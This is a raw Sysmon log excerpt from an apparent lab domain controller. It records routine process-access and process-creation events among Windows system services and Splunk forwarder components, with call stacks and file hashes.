13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005617Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005616Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005615Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005614Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-454B-6000-7401-000000009A01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:16.130{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-454B-6000-7401-000000009A01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005612Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:15.990{08A6967A-454B-6000-7401-000000009A01}4336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005651Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-454D-6000-7601-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005650Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005649Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005648Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005647Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005646Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005645Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005644Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005643Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005642Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005641Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-454D-6000-7601-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005640Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.959{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-454D-6000-7601-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005639Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:17.819{08A6967A-454D-6000-7601-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.927{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-454E-6000-7901-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.927{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-454E-6000-7901-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.927{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-454E-6000-7901-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.865{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-454E-6000-7801-000000009A01}4400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005669Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.849{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-454E-6000-7801-000000009A01}4400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005668Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.849{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-454E-6000-7801-000000009A01}4400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005667Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:18.771{08A6967A-454E-6000-7701-000000009A01}47444712C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 